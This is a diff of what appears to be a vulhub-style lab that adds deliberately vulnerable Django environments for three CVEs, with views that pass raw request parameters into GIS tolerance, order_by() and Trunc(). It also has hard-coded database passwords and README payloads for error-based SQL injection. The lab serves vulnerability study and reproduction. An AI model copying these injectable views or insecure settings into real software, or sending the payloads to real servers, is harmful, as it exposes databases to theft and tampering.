+      "path": "SRID=4326;LINESTRING (-0.00787362456321716 0.0426149328995521, -0.00715211033821105 -0.0137838719945693)"}
+  },
+  {
+    "model": "vuln.collection2",
+    "pk": 41,
+    "fields": {
+      "point": "SRID=4326;POINT (-0.008518695831298819 0.00583514570181413)"}
+  },
+  {
+    "model": "vuln.collection2",
+    "pk": 61,
+    "fields": {
+      "point": "SRID=4326;POINT (0.0153462588787079 0.00642254947271488)"}
+  }
+]

django/CVE-2020-9402/src/manage.py

@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+"""Django's command-line utility for administrative tasks."""
+import os
+import sys
+
+
+def main():
+    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'CVE20209402.settings')
+    try:
+        from django.core.management import execute_from_command_line
+    except ImportError as exc:
+        raise ImportError(
+            "Couldn't import Django. Are you sure it's installed and "
+            "available on your PYTHONPATH environment variable? Did you "
+            "forget to activate a virtual environment?"
+        ) from exc
+    execute_from_command_line(sys.argv)
+
+
+if __name__ == '__main__':
+    main()

django/CVE-2020-9402/src/vuln/admin.py

@@ -0,0 +1,7 @@
+from django.contrib import admin
+from .models import Collection, Collection2
+
+# Register your models here.
+
+admin.site.register(Collection)
+admin.site.register(Collection2)

django/CVE-2020-9402/src/vuln/apps.py

@@ -0,0 +1,5 @@
+from django.apps import AppConfig
+
+
+class VulnConfig(AppConfig):
+    name = 'vuln'

django/CVE-2020-9402/src/vuln/models.py

@@ -0,0 +1,15 @@
+from django.contrib.gis.db import models
+
+# Create your models here.
+
+class Names(models.Model):
+    name = models.CharField(max_length=128)
+
+    def __str__(self):
+        return self.name
+
+class Collection(Names):
+    path = models.LineStringField()
+
+class Collection2(Names):
+    point = models.PointField()

django/CVE-2020-9402/src/vuln/tests.py

@@ -0,0 +1,3 @@
+from django.test import TestCase
+
+# Create your tests here.

django/CVE-2020-9402/src/vuln/views.py

@@ -0,0 +1,27 @@
+from django.shortcuts import render, HttpResponse
+from django.contrib.gis.geos import Point
+from django.contrib.gis.measure import D
+from django.contrib.gis.db.models.functions import Distance
+from django.contrib.gis.db.models import Union
+from .models import Collection, Collection2
+
+# Create your views here.
+
+def vuln(request):
+    query = request.GET.get('q', default=0.05)
+    qs = Collection.objects.annotate(
+        d=Distance(
+            Point(0.01, 0.01, srid=4326),
+            Point(0.01, 0.01, srid=4326),
+            tolerance=query,
+        ),
+    ).filter(d=D(m=1)).values('name')
+    return HttpResponse(qs)
+
+def vuln2(request):
+    query = request.GET.get('q')
+    qs = Collection2.objects.aggregate(
+            Union('point', tolerance=query),
+    ).values()
+
+    return HttpResponse(qs)

django/CVE-2021-35042/Dockerfile

@@ -0,0 +1,9 @@
+FROM vulhub/django:3.2.4
+
+COPY web/ /usr/src/
+COPY docker-entrypoint.sh /docker-entrypoint.sh
+RUN chmod +x /docker-entrypoint.sh
+
+WORKDIR /usr/src
+ENTRYPOINT [ "bash", "/docker-entrypoint.sh"]
+CMD [ "python", "app.py", "runserver", "0.0.0.0:8000" ]

django/CVE-2021-35042/README.md

@@ -0,0 +1,40 @@
+# Django QuerySet.order_by() SQL Injection (CVE-2021-35042)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Django is a high-level Python web framework that encourages rapid development and clean, pragmatic design.
+
+Django released a security update on July 1, 2021, which fixes a SQL injection vulnerability in the `QuerySet.order_by()` function. This vulnerability affects Django versions before 3.2.5, 3.1.13.
+
+The vulnerability can be exploited when a user has control over the input passed to the order_by() function, allowing for SQL injection at the expected column position.
+
+References:
+
+- <https://www.djangoproject.com/weblog/2021/jul/01/security-releases/>
+
+## Environment Setup
+
+Execute the following command to compile and start a vulnerable Django 3.2.4 server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server is started, you can access the Django home page at `http://your-ip:8000`.
+
+## Vulnerability Reproduction
+
+First, visit `http://your-ip:8000/vuln/` and add the parameter `order=-id` to see the data sorted by ID in descending order:
+
+![](1.png)
+
+To exploit the SQL injection vulnerability, modify the `order` parameter with the following payload, where `vuln_collection` is the model name:
+
+```
+http://your-ip:8000/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23
+```
+
+The SQL error message will be displayed, revealing database information through the error-based SQL injection:
+
+![](2.png)

django/CVE-2021-35042/README.zh-cn.md

@@ -0,0 +1,38 @@
+# Django QuerySet.order_by()函数SQL注入漏洞（CVE-2021-35042）
+
+Django是一个高级的Python Web框架，支持快速开发和简洁实用的设计。
+
+Django在2021年7月1日发布了安全更新，修复了在QuerySet.order_by()函数中存在的SQL注入漏洞。该漏洞影响Django 3.2.5、3.1.13和2.2.24之前的版本。
+
+当用户可以控制传递给order_by()函数的输入时，可以在预期的列位置进行SQL注入攻击。
+
+参考链接：
+
+- <https://www.djangoproject.com/weblog/2021/jul/01/security-releases/>
+
+## 环境搭建
+
+执行如下命令编译并启动一个存在漏洞的Django 3.2.4服务器：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8000`即可看到Django默认首页。
+
+## 漏洞复现
+
+首先访问`http://your-ip:8000/vuln/`，并添加参数`order=-id`以查看按ID降序排序的数据：
+
+![](1.png)
+
+要利用SQL注入漏洞，使用以下payload修改`order`参数，其中`vuln_collection`是模型名称：
+
+```
+http://your-ip:8000/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23
+```
+
+SQL错误信息将会显示，通过基于错误的SQL注入泄露数据库信息：
+
+![](2.png)

django/CVE-2021-35042/docker-compose.yml

@@ -0,0 +1,13 @@
+version: '2'
+services:
+  web:
+    build: .
+    ports:
+    - "8000:8000"
+    depends_on:
+    - db
+  db:
+   image: mysql:5.7
+   environment:
+    - MYSQL_ROOT_PASSWORD=mysql
+    - MYSQL_DATABASE=cve

django/CVE-2021-35042/docker-entrypoint.sh

@@ -0,0 +1,11 @@
+#!/bin/bash
+
+set -ex
+cd /usr/src
+
+wait-for-it.sh -t 0 db:3306 -- echo "mysql is up"
+
+python app.py migrate
+python app.py loaddata collection.json
+
+exec "$@"

django/CVE-2021-35042/web/app.py

@@ -0,0 +1,47 @@
+import os
+import sys
+
+
+os.environ.setdefault("DJANGO_SETTINGS_MODULE", __name__)
+BASE_DIR = os.path.dirname(os.path.abspath(__file__))
+DEBUG = True
+SECRET_KEY = 'vulhub'
+ALLOWED_HOSTS = ['*']
+MIDDLEWARE = [
+    'django.middleware.common.CommonMiddleware',
+]
+
+ROOT_URLCONF = 'vuln.urls'
+LOGGING = {
+    'version': 1,
+    'disable_existing_loggers': False,
+    'handlers': {
+        'console': {
+            'class': 'logging.StreamHandler',
+        },
+    },
+    'loggers': {
+        'django': {
+            'handlers': ['console'],
+            'level': os.getenv('DJANGO_LOG_LEVEL', 'WARNING'),
+        },
+    },
+}
+DATABASES = {
+    'default': {
+        'ENGINE': 'django.db.backends.mysql',
+        'NAME': 'cve',
+        'USER': 'root',
+        'PASSWORD': 'mysql',
+        'HOST': 'db',
+        'PORT': '3306',
+    }
+}
+INSTALLED_APPS = [
+    'vuln'
+]
+
+
+
+from django.core.management import execute_from_command_line
+execute_from_command_line(sys.argv)

django/CVE-2021-35042/web/collection.json

@@ -0,0 +1,30 @@
+[
+  {
+    "model": "vuln.collection",
+    "pk": 1,
+    "fields": {
+      "name": "Example 1"
+    }
+  },
+  {
+    "model": "vuln.collection",
+    "pk": 2,
+    "fields": {
+      "name": "Example 2"
+    }
+  },
+  {
+    "model": "vuln.collection",
+    "pk": 3,
+    "fields": {
+      "name": "Example 3"
+    }
+  },
+  {
+    "model": "vuln.collection",
+    "pk": 4,
+    "fields": {
+      "name": "Example 4"
+    }
+  }
+]

django/CVE-2021-35042/web/vuln/apps.py

@@ -0,0 +1,6 @@
+from django.apps import AppConfig
+
+
+class VulnConfig(AppConfig):
+    name = 'vuln'
+    default_auto_field = 'django.db.models.BigAutoField'

django/CVE-2021-35042/web/vuln/migrations/0001_initial.py

@@ -0,0 +1,21 @@
+# Generated by Django 3.1.4 on 2021-07-05 11:59
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+    initial = True
+
+    dependencies = [
+    ]
+
+    operations = [
+        migrations.CreateModel(
+            name='Collection',
+            fields=[
+                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
+                ('name', models.CharField(max_length=128)),
+            ],
+        ),
+    ]

django/CVE-2021-35042/web/vuln/models.py

@@ -0,0 +1,7 @@
+from django.db import models
+
+# Create your models here.
+
+
+class Collection(models.Model):
+    name = models.CharField(max_length=128)

django/CVE-2021-35042/web/vuln/urls.py

@@ -0,0 +1,7 @@
+from django.urls import include, path, re_path
+from . import views
+
+
+urlpatterns = [
+    path('vuln/', views.vul),
+]

django/CVE-2021-35042/web/vuln/views.py

@@ -0,0 +1,10 @@
+from django.shortcuts import HttpResponse
+from .models import Collection
+
+# Create your views here.
+
+
+def vul(request):
+    query = request.GET.get('order', default='id')
+    q = Collection.objects.order_by(query)
+    return HttpResponse(q.values())

django/CVE-2022-34265/README.md

@@ -0,0 +1,38 @@
+# Django Trunc(kind) and Extract(lookup_name) SQL Injection (CVE-2022-34265)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Django is a high-level Python web framework that encourages rapid development and clean, pragmatic design.
+
+Django released a security update on July 4, 2022, which fixes a SQL injection vulnerability in the Trunc() and Extract() database functions. This vulnerability affects Django versions before 4.0.6, 3.2.14.
+
+References:
+
+- https://www.djangoproject.com/weblog/2022/jul/04/security-releases/
+- https://github.com/django/django/commit/0dc9c016fadb71a067e5a42be30164e3f96c0492
+
+## Environment Setup
+
+Execute the following command to start a vulnerable Django 4.0.5 server:
+
+```
+docker compose up -d
+```
+
+After the server is started, you can access the web page at `http://your-ip:8000`.
+
+## Vulnerability Reproduction
+
+The web application uses the `Trunc` function to aggregate page click counts by datetime. Visit `http://your-ip:8000/?date=minute` to see the number of clicks per minute:
+
+![](1.png)
+
+To exploit the SQL injection vulnerability, modify the `date` parameter with malicious input:
+
+```
+http://your-ip:8000/?date=xxxx'xxxx
+```
+
+The SQL error message will be displayed, confirming the successful injection:
+
+![](2.png)

django/CVE-2022-34265/README.zh-cn.md

@@ -0,0 +1,36 @@
+# Django Trunc(kind)和Extract(lookup_name)函数SQL注入漏洞（CVE-2022-34265）
+
+Django是一个高级的Python Web框架，支持快速开发和简洁实用的设计。
+
+Django在2022年7月4日发布了安全更新，修复了在数据库函数`Trunc()`和`Extract()`中存在的SQL注入漏洞。该漏洞影响Django 4.0.6和3.2.14之前的版本。
+
+参考链接：
+
+- https://www.djangoproject.com/weblog/2022/jul/04/security-releases/
+- https://github.com/django/django/commit/0dc9c016fadb71a067e5a42be30164e3f96c0492
+
+## 环境搭建
+
+执行如下命令启动一个存在漏洞的Django 4.0.5服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8000`即可看到Web页面。
+
+## 漏洞复现
+
+该Web应用使用`Trunc`函数来按照日期时间聚合页面点击次数。访问`http://your-ip:8000/?date=minute`可以查看每分钟的点击次数：
+
+![](1.png)
+
+要利用SQL注入漏洞，修改`date`参数为恶意输入：
+
+```
+http://your-ip:8000/?date=xxxx'xxxx
+```
+
+SQL错误信息将会显示，证实注入成功：
+
+![](2.png)

django/CVE-2022-34265/docker-compose.yml

@@ -0,0 +1,24 @@
+version: '2'
+services:
+  web:
+    image: vulhub/django:4.0.5
+    ports:
+    - "8000:8000"
+    depends_on:
+    - db
+    volumes:
+    - ./web:/usr/src
+    - ./docker-entrypoint.sh:/docker-entrypoint.sh
+    entrypoint:
+    - bash
+    - /docker-entrypoint.sh
+    command:
+    - python
+    - app.py
+    - runserver
+    - 0.0.0.0:8000
+  db:
+   image: postgres:13-alpine
+   environment:
+    - POSTGRES_PASSWORD=postgres
+    - POSTGRES_DB=CVE_2022_34265

django/CVE-2022-34265/docker-entrypoint.sh

@@ -0,0 +1,10 @@
+#!/bin/bash
+
+set -ex
+cd /usr/src
+
+wait-for-it.sh -t 0 db:5432 -- echo "database is up"
+
+python app.py migrate
+
+exec "$@"

django/CVE-2022-34265/web/app.py

@@ -0,0 +1,46 @@
+import os
+import sys
+
+
+os.environ.setdefault("DJANGO_SETTINGS_MODULE", __name__)
+BASE_DIR = os.path.dirname(os.path.abspath(__file__))
+DEBUG = True
+SECRET_KEY = 'vulhub'
+ALLOWED_HOSTS = ['*']
+MIDDLEWARE = [
+    'django.middleware.common.CommonMiddleware',
+]
+
+ROOT_URLCONF = 'vuln.urls'
+LOGGING = {
+    'version': 1,
+    'disable_existing_loggers': False,
+    'handlers': {
+        'console': {
+            'class': 'logging.StreamHandler',
+        },
+    },
+    'loggers': {
+        'django': {
+            'handlers': ['console'],
+            'level': os.getenv('DJANGO_LOG_LEVEL', 'WARNING'),
+        },
+    },
+}
+DATABASES = {
+    'default': {
+        'ENGINE': 'django.db.backends.postgresql',
+        'NAME': 'CVE_2022_34265',
+        'USER': 'postgres',
+        'PASSWORD': 'postgres',
+        'HOST': 'db',
+        'PORT': '5432',
+    }
+}
+INSTALLED_APPS = [
+    'vuln'
+]
+
+
+from django.core.management import execute_from_command_line
+execute_from_command_line(sys.argv)

django/CVE-2022-34265/web/vuln/apps.py

@@ -0,0 +1,6 @@
+from django.apps import AppConfig
+
+
+class VulnConfig(AppConfig):
+    name = 'vuln'
+    default_auto_field = 'django.db.models.BigAutoField'

django/CVE-2022-34265/web/vuln/migrations/0001_initial.py

@@ -0,0 +1,24 @@
+# Generated by Django 4.0.6 on 2022-07-13 22:50
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+    initial = True
+
+    dependencies = [
+    ]
+
+    operations = [
+        migrations.CreateModel(
+            name='WebLog',
+            fields=[
+                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
+                ('method', models.CharField(max_length=16)),
+                ('url', models.CharField(max_length=256)),
+                ('user_agent', models.CharField(max_length=256)),
+                ('created_time', models.DateTimeField(auto_now_add=True)),
+            ],
+        ),
+    ]

django/CVE-2022-34265/web/vuln/models.py

@@ -0,0 +1,9 @@
+from operator import mod
+from django.db import models
+
+
+class WebLog(models.Model):
+    method = models.CharField(max_length=16)
+    url = models.CharField(max_length=256)
+    user_agent = models.CharField(max_length=256)
+    created_time = models.DateTimeField(auto_now_add=True)

django/CVE-2022-34265/web/vuln/urls.py

@@ -0,0 +1,7 @@
+from django.urls import include, path, re_path
+from . import views
+
+
+urlpatterns = [
+    path('', views.vul),
+]

django/CVE-2022-34265/web/vuln/views.py

@@ -0,0 +1,22 @@
+from django.http import HttpResponse, JsonResponse
+from django.db.models.functions import Trunc
+from django.db.models import Count
+from .models import WebLog
+
+
+def create_log(request):
+    method = request.method
+    url = request.build_absolute_uri()
+    user_agent = request.META.get('HTTP_USER_AGENT')
+    WebLog.objects.create(
+        method=method,
+        url=url,
+        user_agent=user_agent
+    )
+
+
+def vul(request):
+    create_log(request)
+    date = request.GET.get('date', 'minute')
+    objects = list(WebLog.objects.annotate(time=Trunc('created_time', date)).values('time').order_by('-time').annotate(count=Count('id')))
+    return JsonResponse(data=objects, safe=False)